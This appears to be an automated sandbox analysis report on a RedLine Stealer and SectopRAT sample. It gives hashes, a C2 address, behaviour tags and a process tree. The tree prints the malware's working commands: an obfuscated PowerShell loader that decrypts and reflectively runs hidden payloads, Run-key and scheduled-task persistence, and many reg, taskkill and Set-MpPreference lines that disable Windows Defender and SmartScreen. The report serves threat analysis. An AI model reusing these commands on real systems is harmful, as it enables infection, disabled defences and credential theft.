Analysis

  • max time kernel
    141s
  • max time network
    135s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250314-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system
  • submitted
    19/03/2025, 04:21

General

  • Target

    d876ec8738585be11926c0ef2eff5b2d006b1218ec2ef5f652affa2f2e696c1c.exe

  • Size

    760KB

  • MD5

    b4b2df0c17b9cc137372cfb2165d613b

  • SHA1

    11f44e224ac71e5de4f70ed47ec0653cab0ce0f1

  • SHA256

    d876ec8738585be11926c0ef2eff5b2d006b1218ec2ef5f652affa2f2e696c1c

  • SHA512

    6a31601940c0a941ad7bc1b56231e9025477d9137e0d683e9085c890ef59d4085262ee4de2664695c3a2209ff4420c64734e38ce24af9722b5f538d2b2bb7798

  • SSDEEP

    12288:AUIDlUvK90yHVBZCs/X8RKbbir1QVt3Wgcf64sE8LZfAFoVbp+iaGMgEnhr6JvLg:GjWmppBeb5wjw

Malware Config

Extracted

Family

redline

Botnet

cheat

C2

193.233.113.113:35361

Signatures

  • Contains code to disable Windows Defender 2 IoCs

    A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.

  • Disables service(s) 3 TTPs
  • Modifies Windows Defender DisableAntiSpyware settings 3 TTPs 1 IoCs
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 7 IoCs
  • Modifies Windows Defender TamperProtection settings 3 TTPs 3 IoCs
  • Modifies firewall policy service 3 TTPs 2 IoCs
  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine payload 1 IoCs
  • Redline family
  • SectopRAT

    SectopRAT is a remote access trojan first seen in November 2019.

  • SectopRAT payload 1 IoCs
  • Sectoprat family
  • UAC bypass 3 TTPs 1 IoCs
  • Modifies boot configuration data using bcdedit 1 TTPs 1 IoCs
  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 40 IoCs

    Run Powershell and hide display window.

  • Disables Task Manager via registry modification
  • Disables use of System Restore points 1 TTPs
  • Modifies Windows Firewall 2 TTPs 1 IoCs
  • Stops running service(s) 4 TTPs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 2 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 30 IoCs
  • Indicator Removal: Clear Persistence 1 TTPs 5 IoCs

    Clear artifacts associated with previously established persistence like scheduletasks on a host.

  • Indicator Removal: File Deletion 1 TTPs

    Adversaries may delete files left behind by the actions of their intrusion activity.

  • Network Share Discovery 1 TTPs

    Attempt to gather information on host network.

  • Launches sc.exe 3 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • System Location Discovery: System Language Discovery 1 TTPs 5 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Kills process with taskkill 9 IoCs
  • Modifies registry key 1 TTPs 2 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\d876ec8738585be11926c0ef2eff5b2d006b1218ec2ef5f652affa2f2e696c1c.exe
    "C:\Users\Admin\AppData\Local\Temp\d876ec8738585be11926c0ef2eff5b2d006b1218ec2ef5f652affa2f2e696c1c.exe"
    1⤵
    • Checks computer location settings
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: GetForegroundWindowSpam
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:5136
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\cqxwsvrp.vd1.bat" "
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1472
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('mLV7KrO3wLHHAAm4GaaFGgjj/GUAMMVOaPh3FGpoUZs='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('BMXXbGgs1mALdsCSxvMtpA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $ZWVZX=New-Object System.IO.MemoryStream(,$param_var); $Tupqk=New-Object System.IO.MemoryStream; $pEVyq=New-Object System.IO.Compression.GZipStream($ZWVZX, [IO.Compression.CompressionMode]::Decompress); $pEVyq.CopyTo($Tupqk); $pEVyq.Dispose(); $ZWVZX.Dispose(); $Tupqk.Dispose(); $Tupqk.ToArray();}function execute_function($param_var,$param2_var){ $YwxMS=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $ALVCG=$YwxMS.EntryPoint; $ALVCG.Invoke($null, $param2_var);}$bwlKi = 'C:\cqxwsvrp.vd1.bat';$host.UI.RawUI.WindowTitle = $bwlKi;$NiVuC=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($bwlKi).Split([Environment]::NewLine);foreach ($OBjYH in $NiVuC) { if ($OBjYH.StartsWith('EiQdPpTgEPKAUuFHgbxm')) { $JPYHw=$OBjYH.Substring(20); break; }}$payloads_var=[string[]]$JPYHw.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
        3⤵
          PID:216
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -w hidden
          3⤵
          • Blocklisted process makes network request
          • Command and Scripting Interpreter: PowerShell
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:224
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\0uqhlpmx.pkq.bat
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:6132
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('8PEylQItydp6DF2KLKsDsMrVgiK6Anhs4Yd2E90Yt80='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('IfesP7NShxOIaefsOsYtLQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $EgdKe=New-Object System.IO.MemoryStream(,$param_var); $IqEPB=New-Object System.IO.MemoryStream; $NGAHc=New-Object System.IO.Compression.GZipStream($EgdKe, [IO.Compression.CompressionMode]::Decompress); $NGAHc.CopyTo($IqEPB); $NGAHc.Dispose(); $EgdKe.Dispose(); $IqEPB.Dispose(); $IqEPB.ToArray();}function execute_function($param_var,$param2_var){ $TAWjc=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $hYpAi=$TAWjc.EntryPoint; $hYpAi.Invoke($null, $param2_var);}$bHXSX = 'C:\Users\Admin\AppData\Local\Temp\0uqhlpmx.pkq.bat';$host.UI.RawUI.WindowTitle = $bHXSX;$AnHdV=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($bHXSX).Split([Environment]::NewLine);foreach ($Yltfo in $AnHdV) { if ($Yltfo.StartsWith('CFYIvkGECqujgRZhzKOC')) { $GVQOC=$Yltfo.Substring(20); break; }}$payloads_var=[string[]]$GVQOC.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
          3⤵
            PID:4032
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
            3⤵
            • Command and Scripting Interpreter: PowerShell
            • Adds Run key to start application
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1416
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "powershell.exe" -WindowStyle Hidden -NoProfile -ExecutionPolicy Bypass -Command "Set-ItemProperty -Path 'HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce' -Name 'WindowsInstaller' -Value 'C:\Users\Admin\AppData\Local\Temp\h2uasj3u.yo3.exe'"
          2⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:5728
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "powershell.exe" -WindowStyle Hidden -NoProfile -ExecutionPolicy Bypass -Command "Set-ItemProperty -Path 'HKCU\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon' -Name 'WindowsInstaller' -Value 'C:\Users\Admin\AppData\Local\Temp\h2uasj3u.yo3.exe'"
          2⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:5532
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "powershell.exe" -WindowStyle Hidden -NoProfile -ExecutionPolicy Bypass -Command "Set-ItemProperty -Path 'HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name 'WindowsInstaller' -Value 'C:\Users\Admin\AppData\Local\Temp\h2uasj3u.yo3.exe'"
          2⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:5920
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "powershell.exe" -WindowStyle Hidden -NoProfile -ExecutionPolicy Bypass -Command "Set-ItemProperty -Path 'HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System' -Name 'WindowsInstaller' -Value 'C:\Users\Admin\AppData\Local\Temp\h2uasj3u.yo3.exe'"
          2⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4424
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "powershell.exe" -WindowStyle Hidden -NoProfile -ExecutionPolicy Bypass -Command "Set-ItemProperty -Path 'HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'WindowsInstaller' -Value 'C:\Users\Admin\AppData\Local\Temp\h2uasj3u.yo3.exe'"
          2⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3396
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "powershell.exe" -WindowStyle Hidden -NoProfile -ExecutionPolicy Bypass -Command "Set-ItemProperty -Path 'HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices' -Name 'WindowsInstaller' -Value 'C:\Users\Admin\AppData\Local\Temp\h2uasj3u.yo3.exe'"
          2⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1496
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "powershell.exe" -WindowStyle Hidden -NoProfile -ExecutionPolicy Bypass -Command "Set-ItemProperty -Path 'HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServicesOnce' -Name 'WindowsInstaller' -Value 'C:\Users\Admin\AppData\Local\Temp\h2uasj3u.yo3.exe'"
          2⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2272
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "powershell.exe" -WindowStyle Hidden -NoProfile -ExecutionPolicy Bypass -Command "Set-ItemProperty -Path 'HKLM\SYSTEM\CurrentControlSet\Services' -Name 'WindowsInstaller' -Value 'C:\Users\Admin\AppData\Local\Temp\h2uasj3u.yo3.exe'"
          2⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2972
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "powershell.exe" -WindowStyle Hidden -NoProfile -ExecutionPolicy Bypass -Command "Set-ItemProperty -Path 'HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders' -Name 'WindowsInstaller' -Value 'C:\Users\Admin\AppData\Local\Temp\h2uasj3u.yo3.exe'"
          2⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4284
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "powershell.exe" -WindowStyle Hidden -NoProfile -ExecutionPolicy Bypass -Command "Set-ItemProperty -Path 'HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders' -Name 'WindowsInstaller' -Value 'C:\Users\Admin\AppData\Local\Temp\h2uasj3u.yo3.exe'"
          2⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:5948
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "powershell.exe" -WindowStyle Hidden -NoProfile -ExecutionPolicy Bypass -Command "Set-ItemProperty -Path 'HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run' -Name 'WindowsInstaller' -Value 'C:\Users\Admin\AppData\Local\Temp\h2uasj3u.yo3.exe'"
          2⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3628
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "powershell.exe" -WindowStyle Hidden -NoProfile -ExecutionPolicy Bypass -Command "Set-ItemProperty -Path 'HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx' -Name 'WindowsInstaller' -Value 'C:\Users\Admin\AppData\Local\Temp\h2uasj3u.yo3.exe'"
          2⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:5628
        • C:\Windows\SYSTEM32\schtasks.exe
          "schtasks" /create /tn "lockwin" /sc MINUTE /mo 1 /tr "C:\Users\Admin\AppData\Local\Temp\h2uasj3u.yo3.exe" /rl LIMITED /f
          2⤵
          • Scheduled Task/Job: Scheduled Task
          PID:2744
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /c taskkill /f /im SecurityHealthSystray.exe
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:1348
          • C:\Windows\system32\taskkill.exe
            taskkill /f /im SecurityHealthSystray.exe
            3⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:5256
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /c taskkill /f /im SecurityHealthService.exe
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:4352
          • C:\Windows\system32\taskkill.exe
            taskkill /f /im SecurityHealthService.exe
            3⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:5060
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /c taskkill /f /im MsMpEng.exe
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:5520
          • C:\Windows\system32\taskkill.exe
            taskkill /f /im MsMpEng.exe
            3⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:6136
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /c taskkill /f /im NisSrv.exe
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:6096
          • C:\Windows\system32\taskkill.exe
            taskkill /f /im NisSrv.exe
            3⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:6088
        • C:\Windows\SYSTEM32\taskkill.exe
          "taskkill.exe" /im Explorer.exe /f
          2⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:5224
        • C:\Windows\SYSTEM32\taskkill.exe
          "taskkill.exe" /im Explorer.exe /f
          2⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:3400
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /c taskkill /f /im SmartScreen.exe
          2⤵
            PID:4712
            • C:\Windows\system32\taskkill.exe
              taskkill /f /im SmartScreen.exe
              3⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:3040
          • C:\Windows\System32\cmd.exe
            "C:\Windows\System32\cmd.exe" /c taskkill /f /im mrt.exe
            2⤵
            • Suspicious use of WriteProcessMemory
            PID:2028
            • C:\Windows\system32\taskkill.exe
              taskkill /f /im mrt.exe
              3⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:5512
          • C:\Windows\System32\cmd.exe
            "C:\Windows\System32\cmd.exe" /c del /f /q "C:\Windows\System32\MsMpEng.exe"
            2⤵
              PID:4732
            • C:\Windows\System32\cmd.exe
              "C:\Windows\System32\cmd.exe" /c del /f /q "C:\Windows\System32\mrt.exe"
              2⤵
                PID:3188
              • C:\Windows\System32\cmd.exe
                "C:\Windows\System32\cmd.exe" /c del /f /q "C:\Windows\System32\NisSrv.exe"
                2⤵
                  PID:4664
                • C:\Windows\System32\cmd.exe
                  "C:\Windows\System32\cmd.exe" /c del /f /q "C:\Windows\System32\smartscreen.exe"
                  2⤵
                    PID:4124
                  • C:\Windows\System32\cmd.exe
                    "C:\Windows\System32\cmd.exe" /c reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v SubmitSamplesConsent /t REG_DWORD /d 0 /f
                    2⤵
                      PID:2012
                      • C:\Windows\system32\reg.exe
                        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v SubmitSamplesConsent /t REG_DWORD /d 0 /f
                        3⤵
                          PID:5900
                      • C:\Windows\System32\cmd.exe
                        "C:\Windows\System32\cmd.exe" /c reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
                        2⤵
                          PID:1944
                          • C:\Windows\system32\reg.exe
                            reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
                            3⤵
                            • Modifies Windows Defender DisableAntiSpyware settings
                            PID:5448
                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
                          2⤵
                          • Command and Scripting Interpreter: PowerShell
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          PID:624
                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Set-MpPreference -SubmitSamplesConsent 0"
                          2⤵
                          • Command and Scripting Interpreter: PowerShell
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          PID:828
                        • C:\Windows\System32\cmd.exe
                          "C:\Windows\System32\cmd.exe" /c reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v EnableControlledFolderAccess /t REG_DWORD /d 0 /f
                          2⤵
                            PID:3832
                            • C:\Windows\system32\reg.exe
                              reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v EnableControlledFolderAccess /t REG_DWORD /d 0 /f
                              3⤵
                                PID:4684
                            • C:\Windows\System32\cmd.exe
                              "C:\Windows\System32\cmd.exe" /c reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v SpynetReporting /t REG_DWORD /d 0 /f
                              2⤵
                                PID:4612
                                • C:\Windows\system32\reg.exe
                                  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v SpynetReporting /t REG_DWORD /d 0 /f
                                  3⤵
                                    PID:5368
                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Set-MpPreference -EnableControlledFolderAccess Disabled"
                                  2⤵
                                  • Command and Scripting Interpreter: PowerShell
                                  • Suspicious behavior: EnumeratesProcesses
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:5072
                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Set-MpPreference -MAPSReporting Disabled"
                                  2⤵
                                  • Command and Scripting Interpreter: PowerShell
                                  • Suspicious behavior: EnumeratesProcesses
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:3172
                                • C:\Windows\System32\cmd.exe
                                  "C:\Windows\System32\cmd.exe" /c reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableRealtimeMonitoring /t REG_DWORD /d 1 /f
                                  2⤵
                                    PID:116
                                    • C:\Windows\system32\reg.exe
                                      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableRealtimeMonitoring /t REG_DWORD /d 1 /f
                                      3⤵
                                      • Modifies Windows Defender Real-time Protection settings
                                      PID:1096
                                  • C:\Windows\System32\cmd.exe
                                    "C:\Windows\System32\cmd.exe" /c reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableBehaviorMonitoring /t REG_DWORD /d 1 /f
                                    2⤵
                                      PID:4500
                                      • C:\Windows\system32\reg.exe
                                        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableBehaviorMonitoring /t REG_DWORD /d 1 /f
                                        3⤵
                                        • Modifies Windows Defender Real-time Protection settings
                                        PID:4212
                                    • C:\Windows\System32\cmd.exe
                                      "C:\Windows\System32\cmd.exe" /c reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableOnAccessProtection /t REG_DWORD /d 1 /f
                                      2⤵
                                        PID:5104
                                        • C:\Windows\system32\reg.exe
                                          reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableOnAccessProtection /t REG_DWORD /d 1 /f
                                          3⤵
                                          • Modifies Windows Defender Real-time Protection settings
                                          PID:5208
                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
                                        2⤵
                                        • Command and Scripting Interpreter: PowerShell
                                        • Suspicious behavior: EnumeratesProcesses
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:1932
                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Set-MpPreference -DisableBehaviorMonitoring $true"
                                        2⤵
                                        • Command and Scripting Interpreter: PowerShell
                                        • Suspicious behavior: EnumeratesProcesses
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:4384
                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Set-MpPreference -DisableOnAccessProtection $true"
                                        2⤵
                                        • Command and Scripting Interpreter: PowerShell
                                        • Suspicious behavior: EnumeratesProcesses
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:3944
                                      • C:\Windows\System32\cmd.exe
                                        "C:\Windows\System32\cmd.exe" /c reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ExploitGuard\Controlled Folder Access" /v EnableControlledFolderAccess /t REG_DWORD /d 0 /f
                                        2⤵
                                          PID:3628
                                          • C:\Windows\system32\reg.exe
                                            reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ExploitGuard\Controlled Folder Access" /v EnableControlledFolderAccess /t REG_DWORD /d 0 /f
                                            3⤵
                                              PID:4336
                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Set-MpPreference -EnableControlledFolderAccess Disabled"
                                            2⤵
                                            • Command and Scripting Interpreter: PowerShell
                                            • Suspicious behavior: EnumeratesProcesses
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:5972
                                          • C:\Windows\System32\cmd.exe
                                            "C:\Windows\System32\cmd.exe" /c reg add "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard\Scenarios\KernelModeCodeIntegrity" /v Enabled /t REG_DWORD /d 0 /f
                                            2⤵
                                              PID:5324
                                              • C:\Windows\system32\reg.exe
                                                reg add "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard\Scenarios\KernelModeCodeIntegrity" /v Enabled /t REG_DWORD /d 0 /f
                                                3⤵
                                                  PID:5044
                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Set-ProcessMitigation -System -Disable KernelModeCodeIntegrity"
                                                2⤵
                                                • Command and Scripting Interpreter: PowerShell
                                                • Suspicious behavior: EnumeratesProcesses
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:3744
                                              • C:\Windows\System32\cmd.exe
                                                "C:\Windows\System32\cmd.exe" /c reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer" /v SmartScreenEnabled /t REG_SZ /d Off /f
                                                2⤵
                                                  PID:4288
                                                  • C:\Windows\system32\reg.exe
                                                    reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer" /v SmartScreenEnabled /t REG_SZ /d Off /f
                                                    3⤵
                                                      PID:3096
                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Set-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer' -Name 'SmartScreenEnabled' -Value 'Off'"
                                                    2⤵
                                                    • Command and Scripting Interpreter: PowerShell
                                                    • Suspicious behavior: EnumeratesProcesses
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:5808
                                                  • C:\Windows\System32\cmd.exe
                                                    "C:\Windows\System32\cmd.exe" /c reg add "HKLM\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter" /v EnabledV9 /t REG_DWORD /d 0 /f
                                                    2⤵
                                                      PID:4812
                                                      • C:\Windows\system32\reg.exe
                                                        reg add "HKLM\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter" /v EnabledV9 /t REG_DWORD /d 0 /f
                                                        3⤵
                                                          PID:5760
                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Set-ItemProperty -Path 'HKLM:\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter' -Name 'EnabledV9' -Value 0"
                                                        2⤵
                                                        • Command and Scripting Interpreter: PowerShell
                                                        • Suspicious behavior: EnumeratesProcesses
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:6140
